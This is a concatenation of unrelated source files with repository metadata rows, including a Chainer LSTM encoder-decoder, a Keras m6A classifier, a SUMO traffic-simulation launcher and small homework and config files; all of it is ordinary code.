embID = chainer.links.EmbedID(vocab_size, embedding_size)
embID_decoder = chainer.links.EmbedID(vocab_size, embedding_size)
# lstm = chainer.links.LSTM(in_size=10, out_size=10)
encoder_lstm = chainer.links.StatelessLSTM(in_size=embedding_size, out_size=n_units)
decoder_lstm = chainer.links.StatelessLSTM(in_size=embedding_size, out_size=n_units)
output_layer = chainer.links.Linear(n_units, vocab_size)
x_len = len(x_dataset[0])
# c and h should be zero-initialized before the first LSTM step.  [translated]
c = chainer.Variable(np.zeros((x_len, n_units), dtype=np.float32))
h = chainer.Variable(np.zeros((x_len, n_units), dtype=np.float32))
h_list = []
for i, x in enumerate(x_dataset):
    print "-" * 10
    x = embID(x)
    x_len = x.data.shape[0]
    h_len = h.data.shape[0]
    print "x_len:", x_len
    print "h_len:", h_len
    # When the current time-slice is smaller than the carried state, some
    # sequences have ended: keep only the still-active rows of c and h.
    if x_len < h_len:
        h, h_stop = chainer.functions.split_axis(h, [x_len], axis=0)
        c, c_stop = chainer.functions.split_axis(c, [x_len], axis=0)
        # Store the hidden states of sequences that already finished.  [translated]
        h_list.append(h_stop)
    print "h:", h.data.shape
    print "c:", c.data.shape
    c, h = encoder_lstm(c, h, x)
    # print h.data
h_list.append(h)
# Given the append order, reversing here feels more natural?  [translated author note]
h_list.reverse()
h_encoded = chainer.functions.concat(h_list, axis=0)
print h_encoded.data.shape
# print h_encoded.data
def _make_tag(_batchsize, tag=0):
    # Build a (_batchsize,) int32 vector filled with the given tag id.
    shape = (_batchsize,)
    return np.full(shape, tag, dtype=np.int32)
x_len = len(x_dataset[0])
c = chainer.Variable(np.zeros((x_len, n_units), dtype=np.float32))
# h = chainer.Variable(np.zeros((x_len, out_size), dtype=np.float32))
# Seed the decoder hidden state with the encoder output.
h = h_encoded
start_tag = _make_tag(batchsize, tag=0)
start_tag = [chainer.Variable(start_tag)]
end_tag = _make_tag(batchsize, tag=1)
end_tag = [chainer.Variable(end_tag)]
# y = start_tag
decode_start_idx = 0
# decode
# Assume y_dataset starts with <s>?  [translated author note]
# Handling <eos> during mini-batching is awkward, so it would be better to
# preprocess the data ahead of time as:  [translated author note]
# [0, 1, 2, 3, <eos>]
# [0, 3, <eos>]
# [0, 1, 2, <eos>]
# which seems preferable.  [translated author note]
y_dataset = list(y_dataset)
# for target in y_dataset:
for y, t in zip(start_tag + y_dataset[:-1], y_dataset[1:]):
    print "-" * 10
    y_embedding = embID(y)
    # y_len = y_embedding.data.shape[0]
    y_len = y_embedding.data.shape[0]
    # t_len = t.data.shape[0]
    h_len = h.data.shape[0]
    target_len = t.data.shape[0]
    # print t
    # print t_len
    print "y_len:", y_len
    print "target_len:", target_len
    # Truncate carried state / input rows whenever the target batch shrinks.
    if target_len < h_len:
        h, h_stop = chainer.functions.split_axis(h, [target_len], axis=0)
        c, c_stop = chainer.functions.split_axis(c, [target_len], axis=0)
    if target_len < y_len:
        y_embedding, _stop_y_embedding = chainer.functions.split_axis(y_embedding, [target_len], axis=0)
    print "y_embedding:", y_embedding.data.shape
    print "h:", h.data.shape
    # NOTE(review): this reuses encoder_lstm in the decode loop; decoder_lstm
    # defined above is never used -- possibly intended here.  Confirm.
    c, h = encoder_lstm(c, h, y_embedding)
    predict = output_layer(h)
    print "predict:", predict.data.shape
print h
# x_len = x.data.shape[0]
# h_len = h.data.shape[0]
# embID_decoder()
# loss = functions.softmax_cross_entropy(y, t)
# x = embID(x)
# x_len = x.data.shape[0]
# h_len = h.data.shape[0]
| [
"nanigashi03@gmail.com"
] | nanigashi03@gmail.com |
65e893cd076a735f16f7fe5a29f4a839759724bc | 8dc333b7823c2cc5f4bb4adb75da37dcab06495f | /Section1.py | f0b657a08e18c2e71c97fe025deaf7856ec5a962 | [] | no_license | Mud-Fire/Math_Homework | cdb3c7729d7799a4ceeed2b506a239d305d5a608 | 119c26ab4c544e7652ac449661d2a39cd8b79480 | refs/heads/master | 2021-05-07T15:03:10.286846 | 2017-11-08T11:44:11 | 2017-11-08T11:44:11 | 109,968,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 999 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Oct 12 12:53:13 2017
@author: zb
"""
#获取需要计算的项数
strN = input("Please enter an integer greater than 2:")
countN = int(strN)
#记录精确值
sumExact = 0.5 * (1.5-1/countN - 1/(countN+1))
#记录从小到大加法运算的和
sumOrder = 0
#记录从大到小加法运算的和
sumReOrder = 0
#每次循环的N值初始化
countNOrder = 2
countNReOrder = countN
if countN > 1:
#对N项进行循环相加
while countNOrder <= countN:
print(countNOrder,countNReOrder)
sumOrder += 1/(countNOrder**2-1)
sumReOrder += 1/(countNReOrder**2-1)
countNOrder += 1
countNReOrder -= 1
#对结果进行打印比较
print("===========result==================")
print("Order summation %f"%sumOrder)
print("Reverse order summation %f"%sumReOrder)
print("Exact Value %f"%sumExact)
else:
print("Please enter an integer greater than 2 ") | [
"noreply@github.com"
] | Mud-Fire.noreply@github.com |
837f178ec38d14871743e1d84aa11312970b3087 | ae9f2d64c8d0fc711d426e80e41bbce158ab7a4e | /build/config.gypi | 8529efc74c687d82ee2470bca8a5e886d916f502 | [] | no_license | aitchkhan/Real-Time-Chat-with-Node-js | 2863c3b9a173d1807acd5696decb74f66ddd79a7 | 201b7c6126c28f09415699521b6401349bf5cee3 | refs/heads/master | 2021-01-23T16:40:01.118218 | 2015-11-08T12:46:42 | 2015-11-08T12:46:42 | 34,112,637 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,524 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"host_arch": "x64",
"icu_data_file": "icudt54l.dat",
"icu_data_in": "../../deps/icu/source/data/in\\icudt54l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps\\icu",
"icu_small": "true",
"icu_ver_major": "54",
"node_has_winsdk": "true",
"node_install_npm": "true",
"node_prefix": "",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_dtrace": "false",
"node_use_etw": "true",
"node_use_mdb": "false",
"node_use_openssl": "true",
"node_use_perfctr": "true",
"openssl_no_asm": 0,
"python": "C:\\Python27\\python.exe",
"target_arch": "ia32",
"uv_library": "static_library",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "false",
"visibility": "",
"want_separate_host_toolset": 0,
"nodedir": "C:\\Users\\aitchkhan\\.node-gyp\\0.12.2",
"copy_dev_lib": "true",
"standalone_static_library": 1
}
}
| [
"aitchkhan@gmail.com"
] | aitchkhan@gmail.com |
bbf45532ab46317e7c548a735d5a2663e074b126 | e9263f1f1a780e831464626ffcc74a9eeb2b2f12 | /print_request.py | 6ea534ce1cc3bef70a40a813e279197625d05893 | [] | no_license | OPEOStudio/kraft_bootstrap | bd26bb9bdd187961b36a2a1753f325fe45515a06 | e5e0e07694cd792aa82107832714d3a90696e6ac | refs/heads/master | 2020-04-06T18:57:23.106134 | 2019-01-16T10:05:12 | 2019-01-16T10:05:12 | 157,719,675 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,268 | py | import requests
import json
### PRINT THE REQUEST
# Script to print the request, to make sure that all the right request elements are being sent
# DOESN'T WORK FOR NOW
def print_r(string, url, data, headers, params):
    """Build, prepare and pretty-print a requests.Request.

    `string` is the HTTP method name; the remaining arguments are passed
    straight through to requests.Request.
    """
    print("headers : " + str(headers))
    req = requests.Request(string, url, data=data, headers=headers, params=params)
    print("request: " + str(req))
    # Hand the fully prepared request to the printing step.
    pretty_print_POST(req.prepare())
def pretty_print_POST(request):
    """Dump a prepared request in a wire-like, human-readable form.

    The request object is fully built ("prepared") at this point; the layout
    below is for pretty printing and may differ slightly from the bytes that
    are actually sent.
    """
    print(" ")
    print('-----------START-----------')
    print(request.method + ' ' + request.url)
    print('\n'.join('{}: {}'.format(k, v) for k, v in request.headers.items()))
    print()
    print(request.body)
| [
"36651512+musiquarc@users.noreply.github.com"
] | 36651512+musiquarc@users.noreply.github.com |
25859d62514ea506faa2e5384810904d8205659b | 78560437a0cc6c1e34ab654c32f5fab465530aeb | /EstruturaSequencial/16_Casa_tintas.py | 33770d4450d1d1c267287eb062f08bf53000ce0c | [] | no_license | StefanOliveira/ExerciciosPython | bec15ab3fb0c10aebde1e2d8e5992fd9b77bb2c8 | f7b51276e2e2ed7bb4160615b49a5df24c50e248 | refs/heads/master | 2020-03-20T14:26:51.306691 | 2018-08-20T19:33:16 | 2018-08-20T19:33:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | nQtdMts = float(input('Informe a area em metros que será pintada: '))
# One 18 L can of paint covers 54 m^2 (3 m^2 per litre of paint).
litres = nQtdMts / 3.0
# Round the can count up: any remainder needs one extra can.
cans, leftover = divmod(litres, 18.0)
cans = int(cans)
if leftover != 0:
    cans += 1
print('Você precisa de', cans, 'latas de tinta')
print('Total a pagar:', cans * 80)
| [
"noreply@github.com"
] | StefanOliveira.noreply@github.com |
e74628558b410dabd6460047e5def4308c79a579 | d153be2b35d7274bfadc305af19ee5f6827efb07 | /captain_console/cart/migrations/0004_auto_20200514_2204.py | 3ecf0942392a7f84050e3aac1fef658200e62178 | [] | no_license | bjorgvin16/verklegt2 | 1796ee6b4e8e4a6ab8fe5f1776109d56e4777d05 | f833243c5f48e54817fe105f33ce216ec66c3c6c | refs/heads/master | 2022-07-26T03:04:14.805467 | 2020-05-15T23:08:53 | 2020-05-15T23:08:53 | 259,272,640 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 481 | py | # Generated by Django 3.0.6 on 2020-05-14 22:04
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration for the `cart` app: drops the
    # `quantity` field from Order and adds it to Cart (existing Cart rows
    # default to a quantity of 1).

    dependencies = [
        ('cart', '0003_order_orderdate'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='order',
            name='quantity',
        ),
        migrations.AddField(
            model_name='cart',
            name='quantity',
            field=models.IntegerField(default=1),
        ),
    ]
| [
"margriette123@gmail.com"
] | margriette123@gmail.com |
2933d2996ff2c284d1fd6b90cd4dfcbf24fdc883 | 8953c8dce654ae32a80adf873376ea5566daead7 | /eif3a_full_m6aReader.py | 5854751b65e91f4e21efdba142d57127f35c3467 | [] | no_license | yuxuanwu17/m6a_dp | 5e17e86b2ea2133e69beec0eab8abc7877d90276 | f3a5966f9abcce7077839024a71f01a139689967 | refs/heads/master | 2022-11-20T15:06:34.470254 | 2020-07-21T14:27:15 | 2020-07-21T14:27:15 | 280,642,621 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,201 | py | #%%
# To prepare model training, we import the necessary functions and submodules from keras
import pandas as pd
import numpy as np
from keras.models import Sequential
from keras.layers.core import Dropout, Reshape, Dense, Activation, Flatten
from keras.layers.convolutional import Conv1D, MaxPooling1D
from keras.optimizers import Adadelta, SGD, RMSprop;
import keras.losses;
from keras.constraints import maxnorm;
from keras.utils import normalize, to_categorical
from keras.layers.normalization import BatchNormalization
from keras import regularizers
from keras.callbacks import EarlyStopping, History, ModelCheckpoint
from keras import backend as K
import matplotlib.pyplot as plt
from matplotlib import pyplot
from sklearn.metrics import precision_score, recall_score, accuracy_score, f1_score, precision_recall_curve, auc
from pandas import DataFrame
#%%
def load_data():
    """Load the eif3a train/test matrices from the combined CSV.

    The left half of the columns (skipping two leading id columns) is the
    training matrix; the right half (minus its first and last column) is the
    test matrix.  Labels are half positives (1) followed by half negatives (0).

    Returns:
        (x_train, x_test, y_test, y_train): feature matrices with a singleton
        axis inserted at position 1, labels as column vectors.
    """
    df = pd.read_csv("eif3a_full_test_m6aReader.csv")
    half = int(len(df.columns) / 2)
    x_train = df.iloc[:, 2:half]
    # Rows with missing values in the test half are dropped.
    x_test = DataFrame(df.iloc[:, (half + 1):(len(df.columns) - 1)]).dropna()
    x_train = np.expand_dims(x_train, axis=1)
    x_test = np.expand_dims(x_test, axis=1)
    y_train = np.mat(np.array([1, 0]).repeat(int(df.shape[0] / 2))).transpose()
    y_test = np.mat(np.array([1, 0]).repeat(int(x_test.shape[0] / 2))).transpose()
    return x_train, x_test, y_test, y_train
def precision(y_true, y_pred):
    """Batch precision metric (TP / predicted positives) on Keras tensors."""
    tp = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
    predicted = K.sum(K.round(K.clip(y_pred, 0, 1)))
    # K.epsilon() guards against division by zero when nothing is predicted.
    return tp / (predicted + K.epsilon())
def recall(y_true, y_pred):
    """Batch recall metric (TP / actual positives) on Keras tensors."""
    tp = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
    actual = K.sum(K.round(K.clip(y_true, 0, 1)))
    # K.epsilon() guards against division by zero when there are no positives.
    return tp / (actual + K.epsilon())
#%%
def build_model(x_train):
    """Assemble and compile the 1D-conv binary classifier.

    Two Conv1D/ReLU/MaxPool/Dropout stages feed a dense head ending in a
    single sigmoid unit.  Compiled with binary cross-entropy, Adam, and the
    custom precision/recall metrics defined above.
    """
    model = Sequential()
    model.add(Conv1D(filters=90, kernel_size=1, padding="valid",
                     kernel_regularizer=regularizers.l2(0.01),
                     input_shape=x_train.shape[1::]))
    model.add(Activation('relu'))
    model.add(MaxPooling1D(pool_size=1, strides=1))
    model.add(Dropout(0.25))
    model.add(Conv1D(filters=100, kernel_size=1, padding="valid",
                     kernel_regularizer=regularizers.l2(0.01)))
    model.add(Activation('relu'))
    model.add(MaxPooling1D(pool_size=1, strides=1))
    model.add(Dropout(0.25))
    model.add(Flatten())
    model.add(Dense(1210))
    model.add(Activation("relu"))
    model.add(Dense(1))
    model.add(Activation("sigmoid"))
    model.summary()
    model.compile(loss='binary_crossentropy', optimizer='adam',
                  metrics=['accuracy', precision, recall])
    return model
#%%
def compileModel(model, x_train, x_test, y_test, y_train):
    """Fit `model` with early stopping and best-accuracy checkpointing.

    Args:
        model: compiled Keras model to train.
        x_train, y_train: training features and labels.
        x_test, y_test: used as the validation set during fitting.
    Returns:
        The Keras History object produced by model.fit().
    """
    # Cleanup: removed five no-op parameter self-assignments
    # (`model = model`, `x_train = x_train`, ...) from the original.
    # Stop once val_loss has not improved for 10 consecutive epochs.
    earlystop = EarlyStopping(monitor='val_loss',
                              min_delta=0,
                              patience=10,
                              verbose=1)
    # Keep only the weights of the best validation-accuracy epoch.
    filepath = "weights.best.hdf5"
    checkpoint = ModelCheckpoint(filepath, monitor='val_accuracy', verbose=1, save_best_only=True, mode='max')
    callbacks_list = [checkpoint, earlystop]
    history = model.fit(x_train, y_train, batch_size=128, epochs=100,
                        validation_data=(x_test, y_test),
                        callbacks=callbacks_list)
    return history
# ################################
# print('draw the loss plot')
# ###############################
def lossplot(history):
    """Plot training vs. validation loss per epoch and save the figure."""
    epoch_axis = np.arange(len(history.epoch)) + 1
    plt.plot(epoch_axis, history.history['val_loss'], label='val loss')
    plt.plot(epoch_axis, history.history['loss'], label='loss')
    plt.title("Effect of model capacity on validation loss\n")
    plt.xlabel('Epoch #')
    plt.ylabel('Validation Loss')
    plt.legend()
    plt.savefig('/home/yuxuan/dp/m6aReader/loss_m6areader.png')
    print("")
    print("The loss plot is saved \n")
def roc(model, x_test, y_test):
    """Draw the ROC curve for `model` on the test set; return the AUROC."""
    print('Start drawing the roc curve \n')
    from sklearn.metrics import roc_curve
    from sklearn.metrics import auc
    scores = model.predict(x_test).ravel()
    fpr, tpr, _ = roc_curve(y_test, scores)
    auroc = auc(fpr, tpr)
    plt.cla()
    plt.figure(1)
    plt.plot([0, 1], [0, 1], 'k--')  # chance diagonal
    plt.plot(fpr, tpr, label='AUROC (area = {:.3f})'.format(auroc))
    plt.xlabel('False positive rate')
    plt.ylabel('True positive rate')
    plt.title('ROC curve')
    plt.legend(loc='best')
    print('AUROC (area = {:.3f})'.format(auroc))
    plt.savefig('/home/yuxuan/dp/m6aReader/ROC_m6areader.png')
    return auroc
def prcurve(model, x_test, y_test):
    """Draw the precision-recall curve and return the PR-AUC."""
    probs = model.predict_proba(x_test)
    prec, rec, _ = precision_recall_curve(y_test, probs)
    pr_auc = auc(rec, prec)
    print('PRAUC: auc=%.3f' % (pr_auc))
    # A "no skill" classifier scores the positive-class prevalence everywhere.
    no_skill = len(y_test[y_test == 1]) / len(y_test)
    pyplot.cla()
    pyplot.plot([0, 1], [no_skill, no_skill], linestyle='--', label='No Skill')
    pyplot.plot(rec, prec, marker='.', label='Logistic')
    pyplot.xlabel('Recall')
    pyplot.ylabel('Precision')
    pyplot.legend()
    plt.savefig('/home/yuxuan/dp/m6aReader/PRAUC_m6areader.png')
    return pr_auc
def MCC(model, x_test, y_test):
    """Matthews correlation coefficient of the model's hard predictions."""
    from sklearn.metrics import matthews_corrcoef
    score = matthews_corrcoef(y_test, model.predict_classes(x_test))
    print('MCC = {:.3f}'.format(score))
    return score
def ACC(model, x_test, y_test):
    """Plain accuracy of the model's hard predictions."""
    from sklearn.metrics import accuracy_score
    score = accuracy_score(y_test, model.predict_classes(x_test))
    print('ACC = {:.3f}'.format(score))
    return score
def main():
    """Train the model, plot diagnostics and save the four metrics as CSV."""
    x_train, x_test, y_test, y_train = load_data()
    model = build_model(x_train)
    history = compileModel(model, x_train, x_test, y_test, y_train)
    lossplot(history)
    # Evaluate in the same order the original stored them: AUROC, PRAUC, MCC, ACC.
    metrics = [roc(model, x_test, y_test),
               prcurve(model, x_test, y_test),
               MCC(model, x_test, y_test),
               ACC(model, x_test, y_test)]
    np.savetxt('/home/yuxuan/dp/m6aReader/eif3a_full_m6aReader.csv', np.array(metrics), delimiter=',')
if __name__ == '__main__':
    main()
| [
"yuxuan.wu17@gmail.com"
] | yuxuan.wu17@gmail.com |
f346c7f538f075ee8c1577c89e089a80c6232447 | 571322962890d461a6b142b42f6ed66be23fb299 | /blog/admin.py | a6493140ae0a0212665647a59d6e8f86f532b104 | [] | no_license | Cyapy/my-first-blog | e94b1e012b2760506a091f9d32018d31fbd237a8 | ec94ef330634377a2f6844de5989ad0cb594c970 | refs/heads/master | 2020-07-23T10:58:54.566605 | 2019-09-10T10:59:43 | 2019-09-10T10:59:43 | 207,536,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | from django.contrib import admin
#from .models import Company
from .models import Post
# Expose the Post model in the Django admin site.
#admin.site.register(Company)
admin.site.register(Post)
| [
"cz.arnold1977@gmail.com"
] | cz.arnold1977@gmail.com |
a49e2c4eeddaf540dfd5ba698a9805c8b952a483 | c9f3ecbf78f890ff598591e6bf326b79f7b22608 | /Python/Chapter 1/ex32.py | 84d63a023dcbb5ab1aa4d9b366425ad84de0ea83 | [] | no_license | bomcon123456/DSA_Learning | f17ceacadaf0398e233c9740d9d24ee5fc76fa69 | d943ec1aa7315d0e34fd3505ccb5a62a415ecf73 | refs/heads/master | 2020-06-25T08:58:50.280816 | 2020-01-02T02:36:17 | 2020-01-02T02:36:17 | 199,265,954 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 535 | py | def ex32():
c = ""
res = 0
plusNext = False
while True:
c = input()
arr = c.split(" ")
if len(arr) == 1:
if c == "+":
res = res
plusNext = True
elif c == "=":
print(res)
return res
else:
if plusNext:
res += float(c)
else:
res = res * 10 + float(c)
else:
raise IOError("Unsupported operations")
ex32()
| [
"termanteus@aos-iMac.local"
] | termanteus@aos-iMac.local |
a160ac123f2a744d1d10d17cfc24c6bec46d13dd | a5bd2739e15716de801d621e6a756c943cb937e4 | /states/base/_grains/reboot_required.py | f8aa8cad002ccccebb1d1d44b3ecc72277a3fcf3 | [] | no_license | ashmckenzie/salt | 00be6ec559769c7aff84f3ed97eb2162ee6bfcc4 | dc67b06e99ad61f203752867ce54dc31a48b9800 | refs/heads/master | 2020-12-23T11:16:58.096353 | 2017-06-21T00:28:26 | 2017-06-21T00:28:26 | 33,473,549 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168 | py | # -*- coding: utf-8 -*-
import os.path
def reboot_required():
    """Salt grain: report whether the OS has flagged a pending reboot.

    Debian/Ubuntu create /var/run/reboot-required when a restart is needed.
    """
    return {'reboot_required': os.path.isfile('/var/run/reboot-required')}
| [
"ash@the-rebellion.net"
] | ash@the-rebellion.net |
7d1d73ca2a8cb31e859f930a208e08029fffaba2 | 650e8c0eef602308e61a6d3c9476bb550c3e4a8c | /StartingOutWithPy/Chapter 02/ProgrammingExercises/09_C_to_F_temp_converter.py | af802349730447421820e6c8bf6b9b99b15d352f | [] | no_license | cosmos512/PyDevoir | 7895d21d70c94074cacab79ca55dc1fca00bd514 | 3eabad164a62c7ef7919e7847033e67e7b0644a3 | refs/heads/master | 2021-01-23T18:59:21.136075 | 2014-08-03T20:10:25 | 2014-08-03T20:10:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | # Write a program that converts Celsius temperatures to Fahrenheit temperatures.
# The formula is as follows:
# 9
# F = - C + 32
# 5
# The program should ask the user to enter a temperature in Celsius, and then
# display the temperature converted to Fahrenheit.
# Convert the entered Celsius reading using F = 9/5 * C + 32.
celsius = float(input('What is the Celsius temperature you saw?: '))
fahrenheit = 9 / 5 * celsius + 32
print("Well, then that means it's", format(fahrenheit, '.1f'), "degrees Fahrenheit.")
| [
"lunlunart@gmail.com"
] | lunlunart@gmail.com |
f6c9eb2dd9064e19a427efac7876905fb88841f9 | 9093f2a305bba661ae671134648a251612226c83 | /manage.py | aaa2b9aa399e90031f7f7112abf86277daa20ef1 | [] | no_license | Regaron/ECommerce | 7b631290f0d709f0d9c52663f705ee0db9e6564e | 55c70e4a9a24192f80906f1d6893fc3dc96e2355 | refs/heads/master | 2020-03-25T04:35:31.878809 | 2019-11-16T14:07:53 | 2019-11-16T14:07:53 | 141,599,613 | 0 | 0 | null | 2018-07-26T04:35:43 | 2018-07-19T15:38:22 | Python | UTF-8 | Python | false | false | 541 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ECommerce.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"sujanbudhathoki123@gmail.com"
] | sujanbudhathoki123@gmail.com |
c36efc1843c3021c334a94bbf23e9898a24991eb | d0235e8259db910f577f418c644f2861b10df3ab | /rectangle_teddybear.pyde | 4c1bd4dd6e664665136a64109ccded12a53fd6b7 | [] | no_license | Ganesh2608/CG | 6b865f35da6f11066defb0bc9cbcef067098ca16 | aa926e54d0089cf22c110f13a01d7313129fc705 | refs/heads/master | 2020-03-27T13:19:45.141485 | 2018-11-12T06:33:12 | 2018-11-12T06:33:12 | 146,603,090 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 664 | pyde | def setup():
#global viewport;
size(700,800);
#viewport = createGraphics();
def draw():
fill(255);
rect(200,120,95,70); #head
rect(225,190,45,160); #body line
rect(270,215,80,27); #hands
rect(145,215,80,27); #hands
rect(270,323,80,27); #legs
rect(145,323,80,27); #legs
rect(230,144,8,8); #eyes left
rect(259,144,8,8); #eyes right
rect(245,155,8,13); #nose
rect(235,173,28,7); #mouth
fill(200,0,0);
rect(239,175,20,5); #tongue
fill(0);
rect(232,146,4,4); #eyes left ball
rect(261,146,4,4); #eyes right ball
| [
"noreply@github.com"
] | Ganesh2608.noreply@github.com |
fcaa9a254056832dd56dc34f39f25cba73e8989e | b04d95eb1d2769945b9d93f223d93815796206f7 | /simulation/execution/startSimulation.py | 7e9fc845db74aaca641f7c3fff0bad9605023008 | [] | no_license | DrRoad/Traffic-Simulation-in-SUMO-and-statistics-generator | 19cbca58f55b3ac64ed598641d3c69afa3edbe52 | c37627c5f32afbac904657d092d149db62cc9148 | refs/heads/master | 2022-01-09T03:06:44.135211 | 2019-07-23T19:52:43 | 2019-07-23T19:52:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,196 | py | import os
import sys
import argparse
import uuid
import datetime
import requests
from lxml import etree
import input_preprocessing as ip
if 'SUMO_HOME' in os.environ:
tools = os.path.join(os.environ['SUMO_HOME'], 'tools')
sys.path.append(tools)
else:
sys.exit("please declare environment variable 'SUMO_HOME'")
import traci
# tripInfo = "../data/input-statistics/tripinfo.xml"
# edgeLane = "../data/input-statistics/edgelane.xml"
simulation_id = ""
scenario_id = ""
scenario_description = ""
# contains TraCI control loop
def run():
    """TraCI control loop: step until every vehicle has left the network."""
    while traci.simulation.getMinExpectedNumber() > 0:
        traci.simulationStep()
    traci.close()
    sys.stdout.flush()
def create_simulation_id():
    """Generate a fresh, timestamp-based simulation id.

    Stores the id in the module-level ``simulation_id`` and also returns it
    for convenience.
    """
    global simulation_id
    # Bug fix: a leftover hard-coded debug id ("2054-07-19-19-35-29") used to
    # overwrite the freshly generated timestamp on the next line; removed.
    simulation_id = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
    return simulation_id
def get_scenario_id(filepath):
    """Read the scenario id from a SUMO config file into module state.

    Sets the module-level ``scenario_id`` (last <scenario> element wins) and
    a matching human-readable ``scenario_description``.
    """
    global scenario_id
    global scenario_description
    document = etree.parse(filepath)
    for node in document.getroot().iter('scenario'):
        scenario_id = node.attrib['id']
    descriptions = {'1': "morning rush hour", '2': "noon"}
    scenario_description = descriptions.get(scenario_id, "afternoon rush hour")
def add_id_to_tripinfo(filepath):
    """Stamp the current simulation/scenario ids onto the tripinfo XML.

    Rewrites <filepath>tripinfo.xml in place with id attributes on every
    <tripinfos> element.
    """
    path = filepath + "tripinfo.xml"
    document = etree.parse(path)
    for node in document.getroot().iter('tripinfos'):
        node.set('id', simulation_id)
        node.set('scenario_id', scenario_id)
        node.set('scenario_description', scenario_description)
    document.write(path)
    print('The statistics id was added', simulation_id)
def add_scenario_to_edge_file(filepath, type_of_file='edgelane'):
    """Stamp scenario id/description onto an edge-based meandata XML file.

    Args:
        filepath: directory prefix the XML file lives in.
        type_of_file: 'edge' selects edge.xml, anything else edgelane.xml.
    """
    path = filepath + ("edge.xml" if type_of_file == 'edge' else "edgelane.xml")
    tree = etree.parse(path)
    for elem in tree.getroot().iter('meandata'):
        elem.set('scenario_id', scenario_id)
        elem.set('scenario_description', scenario_description)
    tree.write(path)
    # Bug fix: the old message concatenated "<id> and<description>" without a
    # space after "and".
    print('The scenario id and description are added to ' + type_of_file,
          scenario_id + ' and ' + scenario_description)
def create_xml_file(filepath, freq, sim_id):
    """Write the SUMO "additional" file requesting edge/lane data dumps.

    Creates <filepath>additional.xml containing a laneData entry (with the
    aggregation frequency) and an edgeData entry, both tagged with sim_id.
    Returns the path of the written file.
    """
    target = filepath + "additional.xml"
    lane_entry = '<laneData id="{}" file="edgelane.xml" freq="{}"/>'.format(sim_id, freq)
    edge_entry = '<edgeData id="{}" file="edge.xml" />'.format(sim_id)
    with open(target, 'w') as out:
        out.write('<additional>' + lane_entry + edge_entry + '</additional>')
    return target
def Main():
    """Parse CLI options, launch SUMO via TraCI, run the configured scenario
    to completion and stamp the generated statistics files with the
    simulation/scenario ids."""
    create_simulation_id()
    parser = argparse.ArgumentParser()
    parser.add_argument('--config', default="../data/input-simulation/scenario2.sumocfg", type=str, help='Give the path to the sumocfg file')
    # parser.add_argument('--additional', default="../data/input-statistics/additional.xml", type=str, help = 'Give the path to the additional file for tripinfo output')
    parser.add_argument('--lanepath', default="../data/output-simulation/", type=str,
                        help='Give the filepath where you want the lanepath to be saved..')
    parser.add_argument('--edgepath', default="../data/output-simulation/", type=str,
                        help='Give the filepath where you want the lanepath to be saved..')
    parser.add_argument('--trippath', default="../data/output-simulation/", type=str,
                        help='Give the filepath where you want the tripinfo to be saved.')
    parser.add_argument('--color', default="origin", type=str,
                        help='Type whether you want cars to be colored based on origin (default) or destination.')
    parser.add_argument('--freq', default=600, type=int)
    args = parser.parse_args()
    # Pre-process vehicle colors; return value currently unused.
    success = ip.set_origin_dest_veh_color(args.color)
    sumoBinary = "sumo-gui"
    get_scenario_id(args.config)
    print(scenario_id, scenario_description)
    # # traci starts sumo as a subprocess and then this script connects and runs
    sumoCMD = [sumoBinary, "-c", args.config,
               "--additional-files", create_xml_file(args.lanepath, args.freq, simulation_id), "--tripinfo-output",
               args.trippath + 'tripinfo.xml']
    print(sumoCMD)
    traci.start(sumoCMD)
    run()
    # Tag the produced output files with this run's identifiers.
    add_id_to_tripinfo(args.trippath)
    add_scenario_to_edge_file(args.edgepath, 'edge')
    add_scenario_to_edge_file(args.edgepath)
    # # make post request
    # # Set the name of the XML file.
    #
    # trips_xml = "../data/output-simulation/" + "tripinfo.xml"
    # url_trips = "http://ios19kirch.ase.in.tum.de/api/simulation/input/trip"
    #
    # edge_lane_xml = "../data/output-simulation/" + "edgelane.xml"
    # url_edge_lane = "http://ios19kirch.ase.in.tum.de/api/simulation/input/flow"
    #
    # edges_xml = "../data/output-simulation/" + "edge.xml"
    # url_edges = "http://ios19kirch.ase.in.tum.de/api/simulation/input/mainroads"
    #
    # headers = {
    #     'Content-Type': 'text/xml'
    # }
    #
    # with open(trips_xml, 'r') as xml:
    #     # Give the object representing the XML file to requests.post.
    #     the_data = xml.read()
    #     r = requests.post(url_trips, data=the_data)
    #     print(r.content)
    #
    # with open(edge_lane_xml, 'r') as xml:
    #     # Give the object representing the XML file to requests.post.
